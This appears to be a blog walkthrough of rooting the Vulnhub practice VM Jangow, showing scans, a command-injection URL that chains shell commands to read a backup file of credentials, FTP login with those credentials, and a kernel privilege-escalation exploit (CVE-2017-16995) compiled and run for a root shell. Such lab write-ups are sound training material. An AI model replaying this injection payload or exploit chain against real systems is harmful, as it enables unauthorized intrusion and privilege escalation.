Table of contents
Jangow is a box on Vulnhub that is centered on enumeration. Enumeration is a very important step in penetration testing. Enumeration is a process in pentesting where you establish an active connection with the victim and try to discover as many attack vectors as possible to exploit the systems further.
Here's how to download and root the Jangow box.
Downloading and Setting Up Jangow
To download Jangow, click this link. Download a mirror or a torrent file and move the Jangow.ova file into your preferred destination.
Jangow can be run on any Virtual Machine provider of your choice. I prefer and would be using VirtualBox because it is more compatible.
Import the Jangow.ova file into VirtualBox. Once it downloads, ensure that you set the Network settings to the same option as the Linux distro you would be using to hack. I use NATNetwork on both my Kali Linux and Jangow machines.
Let’s Begin Hacking!
When you start the Jangow box, it shows the IP address of the box immediately—if you've set up the box well. My Jangow IP address is 10.0.2.5
Run arp-scan -l in your terminal to ensure that the Jangow box is connected to your network.
Starting the Nmap Scan
Nmap is an open-source Linux command-line tool used to scan IP addresses and ports in a network and to detect installed applications.
Type nmap -T4 -A -Pn Your.IP.Address into your terminal.
My nmap scan produced this result:
┌──(root㉿kali)-[~]
└─# nmap -T4 -A -Pn 10.0.2.5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 20:25 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00060s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:85:98:E2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 16.84 seconds
Tip: If your nmap scan is taking a while and you want to see how much time is left, press
Ctrl+X
There are two open ports: FTP port 21 and HTTP port 80.
FTP Port: Trying Out Default Credentials.
The FTP service might be vulnerable to the FTP anonymous login, where the username is anonymous and the password is anonymous.
┌──(root㉿kali)-[~]
└─# ftp 10.0.2.5
Connected to 10.0.2.5.
220 (vsFTPd 3.0.3)
Name (10.0.2.5:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
Ouch! Doesn't work here. Let's move on to Port 80 (HTTP).
HTTP Port: Go to the Webpage
Enter the IP address into your web browser.
Click on the link to the site. It leads to a GrayScale website.
Directory Bursting
We're going to scan this website for directories using dirb and the common.txt wordlist.
Type this into your terminal: dirb http://Your.IP.Address/site/ /usr/share/dirb/wordlists/common.txt
The directory bursting scan produced this result:
┌──(root㉿kali)-[~]
└─# dirb http://10.0.2.5/site/ /usr/share/dirb/wordlists/common.txt
START_TIME: Wed Jul 6 20:58:25 2022
URL_BASE: http://10.0.2.5/site/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
---- Scanning URL: http://10.0.2.5/site/ ----
==> DIRECTORY: http://10.0.2.5/site/assets/
==> DIRECTORY: http://10.0.2.5/site/css/
+ http://10.0.2.5/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://10.0.2.5/site/js/
==> DIRECTORY: http://10.0.2.5/site/wordpress/
---- Entering directory: http://10.0.2.5/site/wordpress/ ----
+ http://10.0.2.5/site/wordpress/index.html (CODE:200|SIZE:10190)
10.0.2.5/site/wordpress/index.html leads us to the HTML of the site.
Clicking on the links to check where they lead brings us an interesting find. When you click on Buscar it leads to an ERROR 404 page that says Not Found.
Command-Line Injection
But that's not the interesting find here. If you look at the URL, you see that it ends with an = sign. That is a possible sign of a command-line injection vulnerability.
If you type in ls -all to list all the directories, you would see that it doesn't throw any errors. Instead, it produces a result. View the Page source for a more organized result.
To view the Page Source, right-click on the web page and click View Page Source or any similar variation depending on your browser.
Move back one directory by typing in cd ..
Separate the commands with ;
List all the directories using the ls -all
You see a .backup file listed among the directories.
Open the .backup file using the cat command.
This is the final URL I used: view-source:http://Your.IP.Address/site/busque.php?buscar=ls -all;cd ..;ls -all;cat .backup.
The credentials we got from the .backup file are:
$username = "jangow01";
$password = "abygurl69";
There is no MySQL port open on this machine. Let's check if the credentials work for the FTP port.
FTP Port: Inputing the .Backup Credentials
┌──(root㉿kali)-[~]
└─# ftp 10.0.2.5
Connected to 10.0.2.5.
220 (vsFTPd 3.0.3)
Name (10.0.2.5:kali): jangow01
331 Please specify the password.
Password: abygurl69
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
It worked!
Now let's change the directory to the home directory and see its content.
ftp> cd /home/
250 Directory successfully changed.
ftp> ls -all
229 Entering Extended Passive Mode (|||42488|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 24 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 jangow01
Change the directory to jangow01 by typing in cd jangow01
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -all
229 Entering Extended Passive Mode (|||18810|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
-rw------- 1 1000 1000 200 Oct 31 2021 .bash_history
-rw-r--r-- 1 1000 1000 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Jun 10 2021 .bashrc
drwx------ 2 1000 1000 4096 Jun 10 2021 .cache
drwxrwxr-x 2 1000 1000 4096 Jun 10 2021 .nano
-rw-r--r-- 1 1000 1000 655 Jun 10 2021 .profile
-rw-r--r-- 1 1000 1000 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
There's a user.txt file. Let's download it using the get command.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||57746|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |****************************| 33 46.03 KiB/s 00:00 ETA
226 Transfer complete.
Opening the user.txt file on my home machine gives this: d41d8cd98f00b204e9800998ecf8427e
We've found the user flag. I tried decoding it but it doesn't bring any worthwhile results.
Gaining the Linux Version
Go to the Jangow box and log in with username:jangow01 and password:abygurl69
Use the uname-a command to get the OS version the Jangow box is using.
jangow01@jangow01: ~$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP
jangow01@jangow01: ~$
Privilege Escalation
Use privilege escalation to move from jangow01 to root.
I checked Google for an exploit for the Linux 4.4.0-31-generic version and found CVE:2017-16995.
Here's a link to the exploit
Copy and paste the exploit code into a .c file. I saved mine as jangow.c
Log into the FTP service again using this command ftp Your.IP.Address
Change the directory to the Jangow01 directory using cd /home/jangow01
Upload the exploit file from your home machine into the FTP using this command: put jangow.c
ftp> put jangow.c
local: jangow.c remote: jangow.c
229 Entering Extended Passive Mode (|||40422|)
150 Ok to send data.
100% ***************************************************| 13248 60.16 MiB/s 00:00 ETA
226 Transfer complete.
13248 bytes sent in 00:00 (6.49 MiB/s)
ftp>
Go to the Jangow machine and check if the file was successfully uploaded.
As you can see, it was uploaded.
Now let's compile and assemble the .c file using the gcc command:
gcc jangow.c -o jangow
Now to make it executable:
chmod +x jangow
Then execute the script: ./jangow
It launches a shell.
jangow01@jangow01:~$ gcc jangow.c -o jangow
jangow01@jangow01:~$ chmod +x jangow
jangow01@jangow01:~$ ./jangow
[.] (-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened
[.]
[.]
[.*] UID from cred structure: 1000, matches the current: 1000 .1
[.*] hammering cred structure at ffff880033d4d480
[.*] credentials patched, launching shell...
Use the `whoami command to display the name of the current user.
#whoami
root
To view the files in root, type in the command ls /root
#ls /root
proof.txt
cat the proof.txt file to get the flag.
#cat /root/proof.txt
This is the flag!
You have successfully rooted the Jangow box!
Try Out Other Boxes!
Vulnhub has a lot of boxes for you to hack. Use these boxes to practice and improve your pentesting and CTF skills. And remember, there is no one way to hack a box.